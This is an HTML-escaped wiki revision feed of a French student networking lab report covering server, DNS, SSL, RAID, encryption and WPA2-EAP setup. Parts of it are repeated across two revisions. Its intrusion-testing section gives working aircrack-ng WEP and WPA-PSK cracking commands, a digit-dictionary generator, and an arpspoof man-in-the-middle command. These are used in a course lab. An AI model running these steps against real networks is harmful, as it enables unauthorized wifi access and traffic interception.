&lt;br /&gt;
- le faire dans gandi&lt;br /&gt;
- modifier fichier /etc/bind/named.conf.local en ajoutant :&lt;br /&gt;
 zone &amp;quot;clavaire.site&amp;quot; IN {&lt;br /&gt;
 	type master;&lt;br /&gt;
 	file &amp;quot;/etc/bind/db.clavaire.lan&amp;quot;;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
- puis avoir un ficher db.clavaire.lan :&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA     ns1.clavaire.site. admin.clavaire.site. (&lt;br /&gt;
                               8         ; Serial&lt;br /&gt;
                          604800         ; Refresh&lt;br /&gt;
                           86400         ; Retry&lt;br /&gt;
                         2419200         ; Expire&lt;br /&gt;
                          604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.clavaire.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 @       IN      MX      100 clavaire.site.&lt;br /&gt;
 ns1     IN      A       193.48.57.186&lt;br /&gt;
 www     IN      A       193.48.57.186&lt;br /&gt;
         IN      AAAA    [ipv6]&lt;br /&gt;
&lt;br /&gt;
- relancer bind : &lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
- pour vérifier :&lt;br /&gt;
 host -tany clavaire.site&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation site web par certificat ===&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous avons créé un serveur apache2,&lt;br /&gt;
&lt;br /&gt;
 systemctl start apache2&lt;br /&gt;
&lt;br /&gt;
Nous avons ajouté à la liste des ports, le module ssl en écoute sur le port 443&lt;br /&gt;
&lt;br /&gt;
Ajout du certificat SSL&lt;br /&gt;
&lt;br /&gt;
Tout d'abord, nous avons installé openssl puis nous avons créé une nouvelle clé &lt;br /&gt;
&lt;br /&gt;
 La commande est disponible par mail: simoninrichard@gmail.com&lt;br /&gt;
 &lt;br /&gt;
Nous avons deplacé la clé dans private puis nous avons donné la clé public à Gandi pour générer le fichier&lt;br /&gt;
&lt;br /&gt;
Pour la sécurisation SSl, nous avons utilisé le un serveur mail sur notre VM, mailx.&lt;br /&gt;
&lt;br /&gt;
Pour notre serveur mail, nous avons configuré un chemin de sauvegarde de mail Maildir/, qui ne correspond pas au chemin courant.&lt;br /&gt;
&lt;br /&gt;
 mailx -f Maildir/&lt;br /&gt;
&lt;br /&gt;
Nous avons aussi ajouté un alias afin de recéptionner les mails en admin et non en root.&lt;br /&gt;
&lt;br /&gt;
A l'aide du serveur mail, nous avons pu valider les différentes etapes de validation SSL&lt;br /&gt;
&lt;br /&gt;
Nous devons ensuite activer nos certificats SSL&lt;br /&gt;
&lt;br /&gt;
 a2enmod ssl&lt;br /&gt;
&lt;br /&gt;
Ensuite nous avons modifié notre fichier de conf de notre site: clavaire.site.conf, pour ajouté nos chemins de fichiers de certificat SSL.&lt;br /&gt;
&lt;br /&gt;
Puis un petit restart et notre site est sécurisé.&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation de serveur DNS par DNSSEC ===&lt;br /&gt;
&lt;br /&gt;
Nous avons suivi les différentes étapes du sujet de TP. Nous avons choisis comme nom de zone: clavaire.site.&lt;br /&gt;
&lt;br /&gt;
Nous avons vérifié le bon fonctionnement à l'aide de :&lt;br /&gt;
&lt;br /&gt;
 https://dnsviz.net/d/clavaire.site/dnssec/&lt;br /&gt;
&lt;br /&gt;
== Tests d’intrusion ==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
 &lt;br /&gt;
Dans cette partie, nous avons utilisé le reseau cracotte03 avec un cryptage WEP.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps nous avons annalysé nos interfaces avec  &lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
Le résultat obtenue est&lt;br /&gt;
&lt;br /&gt;
 PHY	 Interface	Driver		Chipset&lt;br /&gt;
 phy0	wlx40a5ef0f6518	rt2800usb	Ralink Technology, Corp. RT5370&lt;br /&gt;
&lt;br /&gt;
Nous obtenons ainsi l'interface de la clé WI-PI.&lt;br /&gt;
Nous démarrons notre interface réseau WIFI pour pouvoir commencer l'écoute sur le channel 3.&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef0f6518 3&lt;br /&gt;
&lt;br /&gt;
Ainsi nous commençons à injecter dans notre réseau à l'aide du bssid de notre WIFI.&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -9 -e cracotte03 -a 04:DA:D2:9C:50:52 wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Nous commençons à capturer les VI sur notre point d'accès à l'aide de la commande&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 3 --bssid 04:DA:D2:9C:50:52 -w test.txt wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
En même temps, nous effectuons des fausses authentification afin d'augmenter le traffic sur notre point d'accès&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -1 0 -e cracotte03 -a 04:DA:D2:9C:50:52  wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Puis nous utilisons aircrack afin d'utiliser tous les Vi pour cracker la clé WEP&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:52 test*.cap &lt;br /&gt;
&lt;br /&gt;
et nous obtenons notre clé pour la cracotte03&lt;br /&gt;
&lt;br /&gt;
 KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:00:0F:FF ] &lt;br /&gt;
 Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
=== Exploitation de failles du système === &lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous avons du trouvé le reseau wifi à cracker en scannant le reseau.&lt;br /&gt;
&lt;br /&gt;
Nous avons pu ainsi attendre une connexion sur le reseau pour récupérer un Handshake grace à airdump.&lt;br /&gt;
&lt;br /&gt;
Une fois les fichiers acquis, nous avons lancé sur un PC fixe plus puissant, la commande de crack par brute force.&lt;br /&gt;
&lt;br /&gt;
aircrack-ng -w fichierbruteforce.txt -b 00:24:0A:F2:C0:18 psk*.cap&lt;br /&gt;
&lt;br /&gt;
Code c pour générer le dictionnaire :&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
 int main(){&lt;br /&gt;
     FILE *f;&lt;br /&gt;
     f = fopen(&amp;quot;fichierbruteforce.txt&amp;quot;,&amp;quot;w&amp;quot;);&lt;br /&gt;
     if(f==NULL){&lt;br /&gt;
         printf(&amp;quot;Erreur lors de l'ouverture c'un fichier&amp;quot;);&lt;br /&gt;
         exit(1);&lt;br /&gt;
     }&lt;br /&gt;
 &lt;br /&gt;
     for(char a=0; a&amp;lt;10;a++)&lt;br /&gt;
     {&lt;br /&gt;
         for(char z=0; z&amp;lt;10;z++)&lt;br /&gt;
         {&lt;br /&gt;
             for(char e=0; e&amp;lt;10;e++)&lt;br /&gt;
             {&lt;br /&gt;
                 for(char r=0; r&amp;lt;10;r++)&lt;br /&gt;
                 {&lt;br /&gt;
                     for(char t=0; t&amp;lt;10;t++)&lt;br /&gt;
                     {&lt;br /&gt;
                         for(char y=0; y&amp;lt;10;y++)&lt;br /&gt;
                         {&lt;br /&gt;
                             for(char u=0; u&amp;lt;10;u++)&lt;br /&gt;
                             {&lt;br /&gt;
                                 for(char i=0; i&amp;lt;10;i++)&lt;br /&gt;
                                 {&lt;br /&gt;
                                     //printf(&amp;quot;%d%d%d%d%d%d%d%d\n&amp;quot;,a,z,e,r,t,y,u,i);&lt;br /&gt;
                                     fprintf(f,&amp;quot;%d%d%d%d%d%d%d%d\n&amp;quot;,a,z,e,r,t,y,u,i);&lt;br /&gt;
                                 }&lt;br /&gt;
                             }&lt;br /&gt;
                         }&lt;br /&gt;
                     }&lt;br /&gt;
                 }&lt;br /&gt;
             }&lt;br /&gt;
         }&lt;br /&gt;
     }&lt;br /&gt;
     fclose(f);&lt;br /&gt;
     return 0;&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
=== Attaque de type &amp;quot;homme au milieu&amp;quot; par usurpation ARP ===&lt;br /&gt;
&lt;br /&gt;
L'objectif de cette manipulation est de nous faire passer pour un utilisateur de notre reseau au près d'un serveur web.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps nous devons modifier la valeur de la variable pour passer en mode routeur,&lt;br /&gt;
&lt;br /&gt;
 sysctl -w net.ipv4.ip_forward=1&lt;br /&gt;
&lt;br /&gt;
Nous commencons ainsi le piratage,&lt;br /&gt;
&lt;br /&gt;
attacker@attacker:~/ arpspoof -i enp0s3 -t 192.168.1.74 193.48.57.186&lt;br /&gt;
&lt;br /&gt;
=== Intrusion sur un serveur d’application Web ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Réalisations ==&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation de données ===&lt;br /&gt;
&lt;br /&gt;
On crée 3 disques virtuel de 1G (lvcreate -L1G -nclavaire-raid1 storage) et on les ajoute au fichier de config.&lt;br /&gt;
On peut créer le raid :&lt;br /&gt;
 mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvda5 /dev/xvda6 /dev/xvda7&lt;br /&gt;
 mkfs.ext4 /dev/md0&lt;br /&gt;
&lt;br /&gt;
Pour qu'il soit monté a chaque démarrage de la vm : &lt;br /&gt;
 mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
&lt;br /&gt;
Et on l'ajoute au fichier /etc/fstab&lt;br /&gt;
&lt;br /&gt;
Avec des fichiers dans le ce volume, meme si un disque est déconnecté, les données sont toujours disponible.&lt;br /&gt;
&lt;br /&gt;
=== Chiffrement de données ===&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous formatons notre clé USB afin de pouvoir utiliser les partitions:&lt;br /&gt;
&lt;br /&gt;
 df -h&lt;br /&gt;
&lt;br /&gt;
Nous connaissons ainsi notre Filesystem:&lt;br /&gt;
&lt;br /&gt;
 fdisk /dev/sdb&lt;br /&gt;
&lt;br /&gt;
Nous pouvons créer une nouvelle partition primaire de la taille de la clé USB, 7.2 Go.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous quittons fdisk mais nous devons exécuter la commande&lt;br /&gt;
&lt;br /&gt;
 partprobe &lt;br /&gt;
&lt;br /&gt;
Pour re-écrire dans la table de partition.&lt;br /&gt;
&lt;br /&gt;
Nous commençons l'initialisations de notre clé cryptée &lt;br /&gt;
&lt;br /&gt;
 sudo cryptsetup luksFormat  /dev/sdb1&lt;br /&gt;
&lt;br /&gt;
 sudo cryptsetup luksOpen /dev/sdb1 home&lt;br /&gt;
&lt;br /&gt;
Nous pouvons accéder à notre clé depuis &lt;br /&gt;
&lt;br /&gt;
 cd /media/pifou/665....62/&lt;br /&gt;
&lt;br /&gt;
Nous avons créé un fichier test en sudo à la racine.&lt;br /&gt;
 &lt;br /&gt;
 sudo cryptsetup luksClose home &lt;br /&gt;
&lt;br /&gt;
Cette commande permet de fermer notre clé cryptée.&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation WiFi par WPA2-EAP ===&lt;br /&gt;
&lt;br /&gt;
==== Configuration borne wifi ====&lt;br /&gt;
&lt;br /&gt;
 wifi-ima5sc(config)# aaa authentication login eap_group3 group radius_group3&lt;br /&gt;
 wifi-ima5sc(config)# radius-server host 193.48.57.186 auth-port 1812 acct-port 1813 key secret_group3&lt;br /&gt;
 wifi-ima5sc(config)# aaa group server radius radius_group3&lt;br /&gt;
 wifi-ima5sc(config-server)# server 193.48.57.186 auth-port 1812 acct-port 1813&lt;br /&gt;
 wifi-ima5sc(config-server)#exit&lt;br /&gt;
 wifi-ima5sc(config)# dot11 ssid SSID_GROUP3&lt;br /&gt;
 wifi-ima5sc(config-ssid)# mbssid guest-mode&lt;br /&gt;
 wifi-ima5sc(config-ssid)# vlan 303&lt;br /&gt;
 wifi-ima5sc(config-ssid)# authentication open eap eap_group3&lt;br /&gt;
 wifi-ima5sc(config-ssid)# authentication network-eap eap_group3&lt;br /&gt;
 wifi-ima5sc(config-ssid)# authentication key-management wpa&lt;br /&gt;
 wifi-ima5sc(config-ssid)#exit&lt;br /&gt;
&lt;br /&gt;
 wifi-ima5sc(config)# int Dot11Radio0&lt;br /&gt;
 wifi-ima5sc(config-if)# encryption vlan 303 mode ciphers aes-ccm tkip&lt;br /&gt;
 wifi-ima5sc(config-if)# mbssid&lt;br /&gt;
 wifi-ima5sc(config-if)#exit&lt;br /&gt;
 wifi-ima5sc(config)# ssid SSID_GROUP3&lt;br /&gt;
&lt;br /&gt;
 wifi-ima5sc(config)# int dot11radio0.3&lt;br /&gt;
 wifi-ima5sc(config-subif)# encapsulation dot1q 303&lt;br /&gt;
 wifi-ima5sc(config-subif)# bridge-group 3&lt;br /&gt;
 wifi-ima5sc(config-subif)#exit&lt;br /&gt;
&lt;br /&gt;
 wifi-ima5sc(config)# int Gi0.3&lt;br /&gt;
 wifi-ima5sc(config-subif)# encapsulation dot1q 303&lt;br /&gt;
 wifi-ima5sc(config-subif)# bridge-group 3&lt;br /&gt;
 wifi-ima5sc(config-subif)#exit&lt;br /&gt;
 wifi-ima5sc(config)#exit&lt;br /&gt;
 wifi-ima5sc# write&lt;br /&gt;
&lt;br /&gt;
Nous avons configuré notre routeur wifi à l'aide de notre Vlan.&lt;br /&gt;
&lt;br /&gt;
==== Installation freeRadius ====&lt;br /&gt;
&lt;br /&gt;
 Sudo apt install freeradius&lt;br /&gt;
&lt;br /&gt;
dans le fichier&lt;br /&gt;
 /etc/freeradius/3.0/users&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons une ligne dans le but d'ajouter un utilisateur&lt;br /&gt;
 pifou Cleartext-Password := &amp;quot;pasglop&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Dans le fichier &lt;br /&gt;
  /etc/freeradius/3.0/client.conf&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons ce paragraphe pour ajouter l'adresse IP du routeur.&lt;br /&gt;
&lt;br /&gt;
 client pra_wifi {&lt;br /&gt;
    ipaddr = 10.60.100.10&lt;br /&gt;
    secret = secret_group3 }&lt;br /&gt;
&lt;br /&gt;
Dans le fichier &lt;br /&gt;
  /etc/freeradius/3.0/mods-enabled/eap&lt;br /&gt;
&lt;br /&gt;
On ajoute la ligne suivante afin de définir le protocole de communication&lt;br /&gt;
 default_eap_type = peap&lt;br /&gt;
&lt;br /&gt;
Et on peut lancer notre freeradius&lt;br /&gt;
 freeradius -X&lt;br /&gt;
&lt;br /&gt;
==== DHCP ====&lt;br /&gt;
Nous devons ensuite configurer notre DHCP afin de donner des adresses lors de la connexion au réseau wifi.&lt;br /&gt;
&lt;br /&gt;
6509E&lt;br /&gt;
 IMA5sc-R2(config)#ip dhcp pool groupe3&lt;br /&gt;
 IMA5sc-R2(dhcp-config)#dns 193.48.57.186&lt;br /&gt;
 IMA5sc-R2(dhcp-config)#network 10.60.103.0 255.255.255.0&lt;br /&gt;
 IMA5sc-R2(dhcp-config)#default-router 10.60.103.254&lt;br /&gt;
 IMA5sc-R2(dhcp-config)#exit&lt;br /&gt;
 IMA5sc-R2(config)#ip dhcp excluded-address 10.60.103.0 10.60.103.10&lt;br /&gt;
 IMA5sc-R2(config)#ip dhcp excluded-address 10.60.103.100 10.60.103.255&lt;br /&gt;
 IMA5sc-R2(config)#exit&lt;br /&gt;
 IMA5sc-R2#sh ip dhcp binding&lt;br /&gt;
&lt;br /&gt;
C9200&lt;br /&gt;
 IMA5sc-R2(config)#ip dhcp pool groupe3&lt;br /&gt;
 IMA5sc-R2(dhcp-config)#dns 193.48.57.186&lt;br /&gt;
 IMA5sc-R2(dhcp-config)#network 10.60.103.0 255.255.255.0&lt;br /&gt;
 IMA5sc-R2(dhcp-config)#default-router 10.60.103.254&lt;br /&gt;
 IMA5sc-R2(dhcp-config)#exit&lt;br /&gt;
 IMA5sc-R2(config)#ip dhcp excluded-address 10.60.103.0 10.60.103.100&lt;br /&gt;
 IMA5sc-R2(config)#ip dhcp excluded-address 10.60.103.200 10.60.103.255&lt;br /&gt;
 IMA5sc-R2(config)#exit&lt;br /&gt;
 IMA5sc-R2#sh ip dhcp binding&lt;br /&gt;
&lt;br /&gt;
== Site Web ==&lt;br /&gt;
&lt;br /&gt;
Achat de clavaire.site[https://www.clavaire.site] sur gandi&lt;br /&gt;
&lt;br /&gt;
Ajout de notre propre DNS : ns1.gandi.net avec un lien direct (glue records) vers notre ip publique de machine.&lt;br /&gt;
&lt;br /&gt;
== Ferme de serveur ==&lt;br /&gt;
&lt;br /&gt;
Ajout du bridge bridgeStudents sur la VM (fichier .cfg)&lt;br /&gt;
&lt;br /&gt;
commande installation python :&lt;br /&gt;
 ansible -i clavaire.ini -m raw -a &amp;quot;apt install python -y&amp;quot; all --user root --ask-pass&lt;br /&gt;
&lt;br /&gt;
commande envoi clé ssh :&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;nowiki&amp;gt; ansible -i clavaire.ini -m authorized_key -a 'user=root state=present key=&amp;quot;{{lookup(&amp;quot;file&amp;quot;,&amp;quot;/root/.ssh/id_rsa.pub&amp;quot;)}}&amp;quot;' --user root --ask-pass all&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour le message du jour, on crée un role &amp;quot;motd&amp;quot; qui va copier notre fichier dans /etc/motd sur notre autre machine. On installe également ntp et on ajoute la ligne pour avoir accès au server ntp.plil.info dans le fichier /etc/ntp.conf&lt;br /&gt;
&lt;br /&gt;
Dockerfile&lt;br /&gt;
&lt;br /&gt;
 FROM httpd&lt;br /&gt;
 COPY ./index.html /usr/local/apache2/htdocs/&lt;br /&gt;
 CMD [ &amp;quot;httpd&amp;quot;, &amp;quot;-D&amp;quot;, &amp;quot;FOREGROUND&amp;quot; ]&lt;br /&gt;
&lt;br /&gt;
 docker build -t web .&lt;br /&gt;
&lt;br /&gt;
 docker run -d web&lt;br /&gt;
&lt;br /&gt;
fichier main.yml&lt;br /&gt;
&lt;br /&gt;
 ---&lt;br /&gt;
 - name: &amp;quot;Install docker on host&amp;quot;&lt;br /&gt;
   hosts: Install_docker&lt;br /&gt;
   remote_user: root&lt;br /&gt;
   vars :&lt;br /&gt;
           &amp;quot;ansible_distribution&amp;quot;: &amp;quot;Debian&amp;quot;&lt;br /&gt;
           &amp;quot;ansible_distribution_release&amp;quot;: &amp;quot;buster&amp;quot; &lt;br /&gt;
   roles:&lt;br /&gt;
           - role: geerlingguy.docker&lt;br /&gt;
 &lt;br /&gt;
 - name: &amp;quot;Setup Docker&amp;quot;&lt;br /&gt;
   hosts: HTTPD&lt;br /&gt;
   remote_user: root&lt;br /&gt;
   roles:&lt;br /&gt;
           - role: HTTPD&lt;/div&gt;</summary>
		<author><name>Tmertz</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=55719</id>
		<title>TP sysres IMA5sc 2020/2021 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=55719"/>
				<updated>2021-01-28T17:51:00Z</updated>
		
		<summary type="html">&lt;p&gt;Tmertz : /* Ferme de serveur */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;TP PRA - SIMONIN/MERTZ - Clavaire&lt;br /&gt;
&lt;br /&gt;
== Informations générales ==&lt;br /&gt;
&lt;br /&gt;
 Hostname : Clavaire&lt;br /&gt;
 IP local : 100.64.0.25/28&lt;br /&gt;
 IP publique : 193.48.57.186/28&lt;br /&gt;
 URL : www.clavaire.site&lt;br /&gt;
&lt;br /&gt;
== Installation VirtualMachine ==&lt;br /&gt;
&lt;br /&gt;
Utilisation de xen pour créer notre machine virtuel sur capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
 xen-create-image --hostname=clavaire --ip=100.64.0.25 --netmask=255.255.255.0 --gateway=100.64.0.5 --password=[pwd habituel] --dir=/usr/local/xen --dist=buster&lt;br /&gt;
&lt;br /&gt;
Lancement de la VM puis connexion :&lt;br /&gt;
 xl create -c /etc/xen/clavaire.cfg&lt;br /&gt;
 xen console clavaire&lt;br /&gt;
&lt;br /&gt;
''Pour quitter la VM : CTRL + ]''&lt;br /&gt;
&lt;br /&gt;
On ajoute des disques à notre VM :&lt;br /&gt;
&lt;br /&gt;
 Rename disque et formatage (lvrename/mkfs)&lt;br /&gt;
 &lt;br /&gt;
 Modif .cfg pour ajouter disques&lt;br /&gt;
 &lt;br /&gt;
 Transfert fichier /var vers nouvelle partition&lt;br /&gt;
 &lt;br /&gt;
 Ajoute au /etc/fstab les disques&lt;br /&gt;
 &lt;br /&gt;
 Mount -a&lt;br /&gt;
&lt;br /&gt;
== Routage du site IPv4 ==&lt;br /&gt;
&lt;br /&gt;
Dans VM : /etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
 address 193.48.57.186&lt;br /&gt;
 netmask 255.255.255.255&lt;br /&gt;
 up ip address add dev eth0 100.64.0.26/24&lt;br /&gt;
 up ip route add default via 100.64.0.2 src 193.48.57.186&lt;br /&gt;
 down ip address del dev eth0 100.64.0.26/24&lt;br /&gt;
 down ip route del default via 100.64.0.2 src 193.48.57.186&lt;br /&gt;
&lt;br /&gt;
Dans gateway&lt;br /&gt;
&lt;br /&gt;
1. ssh zabeth09 et zabeth30&lt;br /&gt;
&lt;br /&gt;
2. minicom -&amp;gt; /dev/ttyACM0 et /dev/ttyUSB0&lt;br /&gt;
&lt;br /&gt;
3. enable&lt;br /&gt;
&lt;br /&gt;
4. conf t&lt;br /&gt;
&lt;br /&gt;
5. ip route 193.48.57.186 255.255.255.255 100.64.0.26&lt;br /&gt;
&lt;br /&gt;
6. exit&lt;br /&gt;
&lt;br /&gt;
7. write&lt;br /&gt;
&lt;br /&gt;
Création du Vlan303 :&lt;br /&gt;
&lt;br /&gt;
Routeur 6509-E&lt;br /&gt;
&lt;br /&gt;
 vlan 303&lt;br /&gt;
 name clavaire303&lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 303&lt;br /&gt;
 no shut&lt;br /&gt;
 ip address 100.64.0.1 255.255.255.0&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 303&lt;br /&gt;
 vrrp 54 ip 10.60.103.254&lt;br /&gt;
 vrrp 54 preempt&lt;br /&gt;
 vrrp 54 priority 110&lt;br /&gt;
&lt;br /&gt;
Routeur C9200&lt;br /&gt;
&lt;br /&gt;
 vlan 333&lt;br /&gt;
 name clavaire303&lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 333&lt;br /&gt;
 no shut&lt;br /&gt;
 ip address 100.64.0.2 255.255.255.0&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 303&lt;br /&gt;
 vrrp 54 address-family ipv4&lt;br /&gt;
 address 10.60.103.254&lt;br /&gt;
 preempt&lt;br /&gt;
 vrrpv2&lt;br /&gt;
&lt;br /&gt;
== Services Internet ==&lt;br /&gt;
=== SSH ===&lt;br /&gt;
modif /etc/ssh/sshd_config :&lt;br /&gt;
&lt;br /&gt;
 Changement port : PORT 2222&lt;br /&gt;
 Login depuis root : PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
service ssh restart&lt;br /&gt;
&lt;br /&gt;
on peut donc :&lt;br /&gt;
ssh root@193.48.57.186 -p 2222&lt;br /&gt;
&lt;br /&gt;
=== DNS ===&lt;br /&gt;
Ajout DNS :&lt;br /&gt;
&lt;br /&gt;
- le faire dans gandi&lt;br /&gt;
- modifier fichier /etc/bind/named.conf.local en ajoutant :&lt;br /&gt;
 zone &amp;quot;clavaire.site&amp;quot; IN {&lt;br /&gt;
 	type master;&lt;br /&gt;
 	file &amp;quot;/etc/bind/db.clavaire.lan&amp;quot;;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
- puis avoir un ficher db.clavaire.lan :&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA     ns1.clavaire.site. admin.clavaire.site. (&lt;br /&gt;
                               8         ; Serial&lt;br /&gt;
                          604800         ; Refresh&lt;br /&gt;
                           86400         ; Retry&lt;br /&gt;
                         2419200         ; Expire&lt;br /&gt;
                          604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.clavaire.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 @       IN      MX      100 clavaire.site.&lt;br /&gt;
 ns1     IN      A       193.48.57.186&lt;br /&gt;
 www     IN      A       193.48.57.186&lt;br /&gt;
         IN      AAAA    [ipv6]&lt;br /&gt;
&lt;br /&gt;
- relancer bind : &lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
- pour vérifier :&lt;br /&gt;
 host -tany clavaire.site&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation site web par certificat ===&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous avons créé un serveur apache2,&lt;br /&gt;
&lt;br /&gt;
 systemctl start apache2&lt;br /&gt;
&lt;br /&gt;
Nous avons ajouté à la liste des ports, le module ssl en écoute sur le port 443&lt;br /&gt;
&lt;br /&gt;
Ajout du certificat SSL&lt;br /&gt;
&lt;br /&gt;
Tout d'abord, nous avons installé openssl puis nous avons créé une nouvelle clé &lt;br /&gt;
&lt;br /&gt;
 La commande est disponible par mail: simoninrichard@gmail.com&lt;br /&gt;
 &lt;br /&gt;
Nous avons deplacé la clé dans private puis nous avons donné la clé public à Gandi pour générer le fichier&lt;br /&gt;
&lt;br /&gt;
Pour la sécurisation SSl, nous avons utilisé le un serveur mail sur notre VM, mailx.&lt;br /&gt;
&lt;br /&gt;
Pour notre serveur mail, nous avons configuré un chemin de sauvegarde de mail Maildir/, qui ne correspond pas au chemin courant.&lt;br /&gt;
&lt;br /&gt;
 mailx -f Maildir/&lt;br /&gt;
&lt;br /&gt;
Nous avons aussi ajouté un alias afin de recéptionner les mails en admin et non en root.&lt;br /&gt;
&lt;br /&gt;
A l'aide du serveur mail, nous avons pu valider les différentes etapes de validation SSL&lt;br /&gt;
&lt;br /&gt;
Nous devons ensuite activer nos certificats SSL&lt;br /&gt;
&lt;br /&gt;
 a2enmod ssl&lt;br /&gt;
&lt;br /&gt;
Ensuite nous avons modifié notre fichier de conf de notre site: clavaire.site.conf, pour ajouté nos chemins de fichiers de certificat SSL.&lt;br /&gt;
&lt;br /&gt;
Puis un petit restart et notre site est sécurisé.&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation de serveur DNS par DNSSEC ===&lt;br /&gt;
&lt;br /&gt;
Nous avons suivi les différentes étapes du sujet de TP. Nous avons choisis comme nom de zone: clavaire.site.&lt;br /&gt;
&lt;br /&gt;
Nous avons vérifié le bon fonctionnement à l'aide de :&lt;br /&gt;
&lt;br /&gt;
 https://dnsviz.net/d/clavaire.site/dnssec/&lt;br /&gt;
&lt;br /&gt;
== Tests d’intrusion ==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
 &lt;br /&gt;
Dans cette partie, nous avons utilisé le reseau cracotte03 avec un cryptage WEP.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps nous avons annalysé nos interfaces avec  &lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
Le résultat obtenue est&lt;br /&gt;
&lt;br /&gt;
 PHY	 Interface	Driver		Chipset&lt;br /&gt;
 phy0	wlx40a5ef0f6518	rt2800usb	Ralink Technology, Corp. RT5370&lt;br /&gt;
&lt;br /&gt;
Nous obtenons ainsi l'interface de la clé WI-PI.&lt;br /&gt;
Nous démarrons notre interface réseau WIFI pour pouvoir commencer l'écoute sur le channel 3.&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef0f6518 3&lt;br /&gt;
&lt;br /&gt;
Ainsi nous commençons à injecter dans notre réseau à l'aide du bssid de notre WIFI.&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -9 -e cracotte03 -a 04:DA:D2:9C:50:52 wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Nous commençons à capturer les VI sur notre point d'accès à l'aide de la commande&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 3 --bssid 04:DA:D2:9C:50:52 -w test.txt wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
En même temps, nous effectuons des fausses authentification afin d'augmenter le traffic sur notre point d'accès&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -1 0 -e cracotte03 -a 04:DA:D2:9C:50:52  wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Puis nous utilisons aircrack afin d'utiliser tous les Vi pour cracker la clé WEP&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:52 test*.cap &lt;br /&gt;
&lt;br /&gt;
et nous obtenons notre clé pour la cracotte03&lt;br /&gt;
&lt;br /&gt;
 KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:00:0F:FF ] &lt;br /&gt;
 Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
=== Exploitation de failles du système === &lt;br /&gt;
